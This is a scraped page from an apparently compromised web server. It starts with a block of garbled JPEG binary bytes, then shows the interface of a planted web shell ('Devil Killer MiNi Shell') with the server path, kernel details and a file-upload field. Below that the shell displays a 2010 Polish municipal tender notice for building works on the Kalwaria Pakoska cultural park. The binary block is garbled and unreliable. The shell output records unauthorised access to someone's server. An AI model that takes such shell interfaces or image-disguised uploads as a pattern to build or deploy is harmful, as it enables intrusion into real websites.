JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100811/246146-N-2010.html

<p class="kh_header"><b>Pakość: Wykonanie robót budowlanych dla inwestycji pn.:	Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk</b><br>
<b>Numer ogłoszenia: 246146 - 2010; data zamieszczenia: 11.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pakość , ul. Rynek 4, 88-170 Pakość, woj. kujawsko-pomorskie, tel. 052 5666073 (74), 5666089, faks 052 5666075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pakosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dla inwestycji pn.:	Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wykonanie robót budowlanych dla inwestycji pn.:
Utworzenia parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk
45000000-7 Roboty budowlane
Zamówienie współfinansowane w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego w latach 2007-2013. 

Roboty budowlane: 
- Renowacja kaplic
- Oświetlenie
- Przyłącza energetyczne
- Tereny zielone
-  Mała architektura
- Toaleta Publiczna - Wzgórze Ludkowskie (elektryka, konstrukcja, wod. - kan.
- Sieci, instalacje, wod - kan.
- Drogi i place
- Centrum Informacji Turystycznej (elektryka, przebudowa, wod -kan.)
- Zabezpieczenie kaplic 
 
2. Opis projektu:
Celem przyjętych rozwiązań projektowych jest odnowienie walorów przestrzennych i estetycznych zabytkowej drogi kalwaryjskiej wraz z towarzyszącymi jej obiektami budowlanymi (kaplicami - stacjami drogi - a także innymi) oraz zielenią. Nie projektuje się zmian układu przestrzennego poszczególnych obszarów Parku Kulturowego poza uzupełnieniem ich o obiekty towarzyszące: (toaleta publiczna na parkingu na Wzgórzu Ludkowskim, przebudowa Starej Plebanii na Centrum Informacji Turystycznej, parking dla samochodów osobowych na Wzgórzu Ludkowskim). Park Kulturowy jest podzielony na cztery obszary. Pracami renowacyjnymi będą objęte: w obszarze I Kalwarii Pakoskiej kaplice I, II, IV, w obszarze III - kaplice VII, VIII, IX, X, XI, XII, XVII, XVIII, XIX, w obszarze IV - kaplice XX, XXI, XXII, XXIII, XXIV i XXV.
Na obszarze I Parku Kulturowego nie projektuje się nowych obiektów kubaturowych. W obszarze III Parku Kulturowego zaprojektowano przebudowę tzw. Starej Plebanii na Centrum Informacji Turystycznej - parterowy budynek z poddaszem użytkowym zostanie zaadaptowany do nowej funkcji. Budynek zachowa swoją bryłę, elewacje zostaną oczyszczone z naleciałości historycznych i uporządkowane estetycznie. W obszarze IV, na Wzgórzu Ludkowskim, projektuje się budynek toalety publicznej (parterowy, kryty wielospadowym dachem). W obszarze III, obok budynku Centrum Informacji Turystycznej oraz w obszarze IV, na wzgórzu Ludkowskim przewiduje się rezerwę terenu na wiaty służące odpoczynkowi pielgrzymów i turystów. W obszarze I Parku Kulturowego nie projektuje się przebudowy istniejącego układu komunikacyjnego - ciągu pieszego - drogi kalwaryjskiej biegnącej częściowo w pasie drogowym drogi wojewódzkiej nr 251 a częściowo obok niego - projektuje się jego uporządkowanie i utwardzenie klińcem i fragmentarycznie kostką brukową, wybudowanie schodów terenowych w sąsiedztwie kaplicy VI oraz utwardzenie kostką betonową wjazdów na posesje (przecinających ciąg pieszy drogi kalwaryjskiej). W obszarze III parku projektuje się uporządkowanie i utwardzenie klińcem, granitową koską brukową ciągów pieszych drogi kalwaryjskiej oraz placyków towarzyszących poszczególnym kaplicom (stacjom) drogi kalwaryjskiej. Projektuje się utwardzenie kostką betonową istniejącego, nieco przekształconego parkingu dla samochodów osobowych i autobusów, obsługującego cmentarz miejski oraz stanowiący główny parking obsługujący turystów i pielgrzymów przybywających do kalwarii, wraz z wjazdem na niego, dojazdu gospodarczego wraz z parkingiem służbowym przy Centrum Informacji Turystycznej. Projektuje się również utwardzenie kostką brukową dojścia - dojazdu do cmentarza miejskiego oraz betonem asfaltowym, wraz z wykonaniem odwodnienia powierzchniowego, fragmentu ul. Cmentarnej biegnącego wzdłuż zachodniego krańca obszaru III Parku Kulturowego - od ul. Barcińskiej do objętej odrębnym, niezależnym, opracowaniem projektowym ul. Cmentarnej biegnącej od ul. Barcińskiej (od skrzyżowania z ul. Jana Krzyżanowskiego) do torów kolejowych na południowym skraju miasta. W obszarze IV Parku Kulturowego projektuje się wykonanie utwardzeń klińcem oraz kostką graniową ścieżek drogi kalwaryjskiej oraz schodów terenowych, a także  utwardzenie kostką betonową dojazdu do wymaganej drogi pożarowej obsługującej Kościół Ukrzyżowania (kaplica XXIII drogi kalwaryjskiej) a także projektowanego parkingu dla samochodów osobowych. Nie   projektuje   się   nowych   miejsc 
 
gromadzenia odpadów stałych w żadnym z obszarów Parku Kulturowego. Do gromadzenia segregowanych odpadów w obszarze I, II i IV będą wykorzystywane dotychczasowe miejsca ich gromadzenia, natomiast w obszarze III, w sąsiedztwie Centrum Informacji Turystycznej projektuje się w miejscu dotychczasowego placu gospodarczego (przy projektowanym parkingu służbowym) ustawienie dwóch kontenerów na odpady (otoczone projektowaną zielenią). We wszystkich obszarach Parku Kulturowego projektuje się uporządkowanie istniejących form zieleni, zarówno niskiej, średniej jak i wysokiej oraz dokonanie nasadzeń uzupełniających i uwypuklających charakter poszczególnych fragmentów drogi kalwaryjskiej, a także zieleni towarzyszącej poszczególnym obiektom kubaturowym: Centrum Informacji Turystycznej oraz toalety publicznej na Wzgórzu Ludkowskim. Ze względu na pełnienie przez część terenu obszaru III Parku Kulturowego - tzw. Rynek Jerozolimski oraz jego najbliższe sąsiedztwo - funkcji parku miejskiego, w tym obszarze projektuje się wykonanie oczka wodnego o naturalnym ukształtowaniu linii brzegowej z wkomponowaną fontanną. Na całym obszarze Parku Kulturowego projektuje się elementy małej architektury: ławki, kosze na śmieci, tablice informacyjne i inne. W poszczególnych obszarach Parku Kulturowego projektuje się:
.	sieci, przyłącza, doziemne instalacje wodociągowe dla projektowanego zaopatrzenia hydrantów pożarowych, punktów poboru wody dla podlewania zieleni oraz projektowanych budynków: toalety publicznej na Wzgórzu Ludkowskim, Centrum Informacji Turystycznej,
.	sieci, przyłącza, doziemne instalacje kanalizacji sanitarnej wraz odprowadzeniem do miejskiej sieci kanalizacji sanitarnej lub do szczelnych, bezodpływowych zbiorników na nieczystości ciekłe dla obsługi projektowanych budynków: toalety publicznej na Wzgórzu Ludkowskim, Centrum Informacji Turystycznej,
.	przyłączy i doziemnej instalacji kanalizacji deszczowej: dla parkingu obsługującego cmentarz miejski z odprowadzeniem do gruntu, dla utwardzonego fragmentu ul. Cmentarnej - z odprowadzeniem powierzchniowym do rowu przyulicznego, dla utwardzonych gminnej leżącej u podnóża Wzgórza Ludkowskiego,
.	sieci, przyłącza, doziemnej instalacji elektroenergetycznej i oświetleniowej: odpowiednio dla zasilenia systemów oświetlenia terenu (typu parkowego oraz akcentującego), projektowanych budynków toalet i Centrum Informacji Turystycznej oraz odbiorników w poszczególnych kaplicach drogi kalwaryjskiej.
Powierzchnia terenu Parku Kulturowego:	- 518 828, 00 m2
	w tym: 	
		obszaru I:	- 12 034, 00 m2
	obszaru II:	- 21 202, 00 m2
	 
obszaru III:	- 434 717, 00 m2
	obszaru IV:	- 50 875, 00 m2
Powierzchnia zabudowy:	- 3 460, 02 m2
       w tym:	
	obiekty nie wchodzące w zakres niniejszego projektu:
	Kaplice Kalwarii Pakoskiej:
	III - Judasz	
	V - Cedron	
	VI - Brama Jerozolimska	
	XIII - Włożenie Krzyża	
	XIV - I Upadek	
	XV - Spotkanie z Maryją	
	XVI - Cyrenejczyk	
	Kościół p.w. Św. Bonawentury	
	Klasztor przy kościele p.w. Św. Bonawentury	
	Budynek gospodarczy przy kościele p.w. Św. Bonawentury	
	Dom rekolekcyjny przy kościele p.w. Św. Bonawentury	
	Dzwonnica przy kościele p.w. Św. Bonawentury	
	Kaplica Św. Rocha przy kościele Św. Bonawentury	
	Budynek gospodarczy na Wzgórzu Ludkowskim	
	Klasztorek na Wzgórzu Ludkowskim	
	obiekty wchodzące w zakres niniejszego projektu:
	Kaplice Kalwarii Pakoskiej:
	I - Wniebowstąpienie Pańskie	
	II - Ogród Gestemański	
	IV - Wniebowzięcie Najświętszej Marii Panny	
	VII - Annasz	
	VIII - Pożegnanie Matki Bożej	
	IX - Wieczernik	
	X - Dom Kajfasza i Więzienie	
	XI - Piłat	
	XII - Herod	
	XVII - Św. Weronika	
	XVIII - II Upadek	
	XIX - Płaczące Niewiasty	
	XX - III Upadek	
	 
                    XXI - Obnażenie	
	XXII - Przybicie do Krzyża	
	XXIII - Kościół Ukrzyżowania	
	XXIV - Opłakiwanie (Zdjęcie z Krzyża)	
	XXV - Grób Zbawiciela	
	
                  przebudowywana na Centrum Informacji Turystycznej
                  Stara Plebania:	
	toaleta publiczna na Wzgórzu Ludkowskim:	
Powierzchnia dróg, chodników i parkingów:
	adaptowanych bez zmian na obszarze Parku Kulturowego:	
	projektowanych:	
	w tym: na obszarze Paru Kulturowego:	
	poza obszarem Parku Kulturowego:	
Powierzchnia terenów zielonych:
adaptowanych bez zmian (w tym gruntów rolnych) na obszarze
Parku Kulturowego: 	
	projektowanych:	
	w tym: na obszarze Paru Kulturowego:	
	poza obszarem Parku Kulturowego:	
Powierzchnia użytkowa obiektów projektowanych:	- 332, 75 m2
       w tym:	przebudowywana na Centrum Informacji Turystycznej Stara Plebania:	- 280, 97 m2
	toaleta publiczna na Wzgórzu Ludkowskim:	- 51, 78 m2
Liczba kondygnacji nadziemnych budynków objętych projektem:
	kaplice Kalwarii objęte projektem:	- 1
	przebudowywana na Centrum Informacji Turystycznej Stara Plebania
	 + poddasze użytkowe	- 1
	toaleta publiczna na Wzgórzu Ludkowskim:	- 1  
Projektowana liczba miejsc postojowych:
	parking przy Centrum Informacji Turystycznej dla sam. osobowych:	- 64
	             w tym: 	dla osób niepełnosprawnych:	- 5
	             	dla autobusów	- 3
	parking przy Centrum Informacji Turystycznej dla sam. osob. pracowników:	- 5
	             w tym: 	dla osób niepełnosprawnych:	- 1
	parking na Wzgórzu Ludkowskim dla sam. osobowych:	- 31
	             w tym: 	dla osób niepełnosprawnych:	- 3
 
Wymiary projektowanych budynków:
	przebudowywana na Centrum Informacji Turystycznej Stara Plebania:
		18, 84 m - 12, 00 m - 9, 68 m
	toaleta publiczna na Wzgórzu Ludkowskim:	8, 92 m - 7, 62 m - 4, 28 m.
3.	Opis lokalizacji projektu:
Park Kulturowy Kalwaria Pakoska zostanie utworzony na obszarze miasta Pakość i wsi Rybitwy (w obrębie gminy Pakość, powiatu inowrocławskiego, województwa kujawsko-pomorskiego). Park będzie obejmował cztery obszarów rozdzielonych szlakami komunikacyjnymi, rzeką Noteć oraz częścią zabudowy miasta Pakość.
Poniżej zamieszczono mapę szczegółową Parku Kulturowego Kalwaria Pakoska:
Spis kaplic: 1. Kaplica - Wniebowstąpienie Pańskie, 2. Kaplica - Ogród Gestemański, 3. Kaplica - Judasz, 4. Kaplica - Wniebowzięcie Najświętszej Maryi Panny, 5. Kaplica - Cedron, 6. Kaplica - Brama Jerozolimska, 7. Kaplica - Annasz, 8. Kaplica - Pożegnanie z Maryją, 9. Kaplica - Wieczernik, 10. Kaplica - Dom Kajfasza i Więzienie, 11. Kaplica - Herod, 12. Kaplica - Piłat, 13. Kaplica - Włożenie Krzyża, 14. Kaplica - Pierwszy Upadek, 15. Kaplica - Spotkanie z Maryją, 16. Kaplica - św. Weronika, 17. Kaplica - Drugi Upadek, 18. Kaplica - Jezus Pociesza Niewiasty, 19. Kaplica - Trzeci Upadek, 20. Kaplica - Obnażenie z Szat, 21. Kaplica - Przybicie do Krzyża, 22. Kościół Ukrzyżowania, 23. Kaplica - Opłakiwanie, 24. Kaplica - Grób Chrystusa, 25. Kaplica - Cyrenejczyk 

Teren projektowanej inwestycji w zakresie objętym niniejszym projektem budowlanym nie jest objęty aktualnym planem miejscowym zagospodarowania przestrzennnego. Dla inwestycji lub dla poszczególnych jej elementów zostały wydane przez Burmistrza Miasta Pakość: decyzja o ustaleniu lokalizacji inwestycji celu publicznego oraz trzy decyzje o ustaleniu warunków zabudowy. Projektowane zagospodarowanie terenu jest zgodne z ustaleniami zawartymi w ww decyzjach. W projekcie respektuje się określone w prawie budowlanym oraz innych przepisach prawa odległości od innych elementów zagospodarowania terenu. Projekt jest wkomponowany w istniejącą infrastrukturę, tak więc nie ma kolizji między nią a projektem. Kalwaria Pakoska jest podzielona na cztery obszary. Teren inwestycji w poszczególnych obszarach jest odmiennie ukształtowany. W obszarze I teren jest lekko pofałdowany, nachylony w kierunku zachodnim w stronę rzeki Noteć, z wyniesieniem w jego wschodniej części. W obszarze II i III teren jest lekko pofałdowany, nachylony w kierunku północnym. W obszarze IV teren jest pofałdowany, nachylony w kierunku południowo - zachodnim, południowym i wschodnim. 
4.	Szczegółowy opis przedmiotu zamówienia określony został w załącznikach do SIWZ:
-	projekt budowlany
-	przedmiary
-	specyfikacje techniczne wykonania i odbioru robót budowlanych
-	decyzje, dokumenty formalno prawne, postanowienia   

Dokumentacja techniczna ze szczegółowymi rozwiązaniami dostępna jest na stronie internetowej www.bip.pakosc.pl oraz do wglądu w Urzędzie Miejskim w Pakości, ul. Rynek 4, pokój 12, telefon (052) 566-60-90, w godzinach urzędowania UM: 700 - 1500,  wtorek: 800 - 1600
5. Zamawiający dopuszcza rozwiązania równoważne opisywanym w dokumentacji.

6. Zamawiający wymaga, aby oferta obejmowała całość przedmiotu zamówienia.

7.Zamawiający wymaga aby Wykonawcy dokonali oględzin, wizji lokalnej na terenie przyszłych robót (realizacji projektu) i w ich okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego- wg załącznika nr 3 - oświadczenia o zaakceptowaniu warunków określonych w SIWZ oraz o zapoznaniu się z warunkami w terenie i nie zgłaszaniu zastrzeżeń co do przedmiotu zamówienia.
8. Rodzaj wynagrodzenia ryczałtowe  na podstawie rozliczenia zgodnie z harmonogramem
W tym przypadku strony umawiają się na wykonanie określonego zakresu prac za określoną, niezmienną cenę.
9. Opłaty za zajęcie pasa drogowego, uzyskanie decyzji w tej sprawie, uzyskanie niezbędnych zezwoleń na prowadzenie prac na obiektach objętych ochroną konserwatorską, przy zieleni objętej ochroną konserwatora przyrody i inne obciążenia z robotami budowlanymi związane - leżą po stronie wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.20-3, 45.21.23.60-7, 45.22.33.00-9, 45.23.00.00-8, 45.23.11.00-6, 45.23.13.00-8, 45.23.31.61-5, 45.23.32.22-1, 45.23.32.60-9, 45.23.31.40-2, 45.23.24.10-9, 45.23.22.00-4, 45.11.13.00-1, 45.22.00.00-5, 77.31.41.00-5, 77.21.16.00-8, 31.52.72.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> . Zamawiający  wymaga wniesienia wadium.
1.)	Zamawiający przewiduje wniesienie wadium w wysokości 100.000,00 zł (słownie: sto tysięcy złotych, 00-100), które należy uiścić w nieprzekraczalnym terminie - do dnia 03.09.2010r., godz. 9.30
2. Wadium należy wpłacić przelewem na rachunek Zamawiającego z dopiskiem na blankiecie wadium na zabezpieczenie oferty - Wykonanie robót budowlanych dla inwestycji pn. Utworzenia parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk, najpóźniej do dnia składania ofert czyli do dnia 3 września 2010r., godz. 9.30

3. Wadium może być wniesione w jednej lub kilku formach:
- pieniądzu, na:
Rachunek sum depozytowych: wpłaty wadium
86 1090 1069 0000 0001 0839 3251 
Bank Zachodni WBK S.A., Oddział 1, ul. św. Jana 15, 88-170 Pakość
- poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo -Kredytowej, z tym  że poręczenie Kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych; 
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.)
4. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 ustawy Pzp.
5.  W przypadku nie zabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium  
     wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie  odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w sprawie spełnienia przez Wykonawcę warunków art. 22 ust. 1 w zb. z art. 44 ustawy   
    Pzp - wg. załącznika nr 2 do SIWZ  
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana na podstawie złożonych dokumentów wg formuły  spełnia-niespełna</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Doświadczenie wykonawcy i podwykonawcy - wykaz wykonanych w okresie ostatnich pięciu lat lub jeśli przedsiębiorca prowadzi działalność gospodarczą w krótszym okresie- wykaz wykonanych w tymże okresie robót budowlanych w zakresie zgodnym z przedmiotem zamówienia- zgodnie z załącznikiem nr 5 do SIWZ
a) Wykonawca musi wykazać, że wykonywał co najmniej jedno zadania o charakterze i złożoności porównywalnej z przedmiotem zamówienia, przy czym wartość zamówienia winna wynosić co najmniej 5 mln PLN brutto.
b) Wykonawca musi wykazać, że wykonywał co najmniej jedno zadanie w zakresie robót konserwatorskich i archeologicznych.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana na podstawie złożonych dokumentów wg formuły  spełnia-niespełna</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał kadrowy- wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z ich informacjami na temat ich kwalifikacji zawodowych, doświadczenia, wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. Wykonawca musi mieć w dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami odpowiednimi do stanowisk jakie zostaną im powierzone. Wykonawca musi mieć w dyspozycji w ofercie kandydatów na każde stanowisko wymienione poniżej:


Lp.	STANOWISKO(funkcja)	Wymaganailość osób	Kwalifikacje iUprawnienia 
1.	Kierownik Budowy - przedstawiciel Wykonawcy	1	wykształcenie techniczne, uprawnienia budowlane , co najmniej dwuletnia praktyka budowlana przy zabytkach nieruchomych lub posiadają wyższe studia w zakresie konserwacji zabytków  przynależność do Izby Inżynierów Budownictwa
2.	Kierownik  Robót Drogowych	1	wykształcenie techniczne, uprawnienia budowlane specj. z zakresu drogownictwa, przynależność do Izby Inżynierów Budownictwa
3.	Kierownik Robót Wodno-Kanalizacyjnych	1	wykształcenie techniczne, uprawnienia budowlane branżowe, przynależność do Izby Inżynierów Budownictwa
4.	Kierownik Robót Elektroenergetycznych	1	wykształcenie techniczne, uprawnienia budowlane branżowe, przynależność do Izby Inżynierów Budownictwa
5.	Kierownik Robót Teletechnicznych	1	wykształcenie techniczne, uprawnienia budowlane branżowe, przynależność do Izby Inżynierów Budownictwa
6.	Kierownik Robót Konstrukcyjno Budowlanych	1	Wykształcenie budowlane, przynależność do Izby Inżynierów Budownictwa
	Do wykazu winna być dołączona kopia uprawnień budowlanych do kierowania robotami budowlanymi każdego z wymienionych inspektorów (przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, o których mowa w ustawie Prawo budowlane i aktualny dokument potwierdzający przynależność do właściwej Izby Inżynierów Budownictwa - zaświadczenie aktualne na dzień składania ofert). Jeśli Wykonawca wskaże w wykazie osobę, którą będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tej osoby.
Prace konserwatorskie przy zabytkach ruchomych mogą wykonywać osoby, które ukończyły wyższe studia w zakresie konserwacji zabytków, a w dziedzinach nie objętych programem wyższych studiów konserwatorskich - osoby posiadające przygotowanie do prowadzenia takich robót
(wg załącznika nr 8 do SIWZ)
UWAGA:
Istnieje możliwość łączenia kilku funkcji przez jedną osobę w przypadku posiadania kilku rodzajów uprawnień lub kwalifikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Część sprawozdania finansowego: bilans rachunków zysków i strat za ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy- za ten okres, z oznaczeniem podmiotu na rzecz którego został sporządzony, a jeżeli sprawozdanie finansowe podlega badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię o badanych sprawozdaniach w części dotyczącej bilansu i rachunku zysków i strat. W  przypadku wykonawców nie zobowiązanych do sporządzenia sprawozdania finansowego -inne dokumenty określające obroty oraz zobowiązania i należności za ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy- za ten okres. 
-Informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wykonawca musi wykazać:

a.	dysponowanie własnymi środkami finansowymi (dopuszczalne jest tu wskazanie środków z kredytu) i-lub zdolnością kredytową potwierdzającą możliwość finansowania zamówienia - min. 1.000.000,00 PLN.


*wyciąg ze sprawozdania zawierający wartości podane w dokumentach z rozdz. 5, pkt .2, ppkt 7 i 8 w walutach innych niż wskazane przez Zamawiającego będą przeliczane:
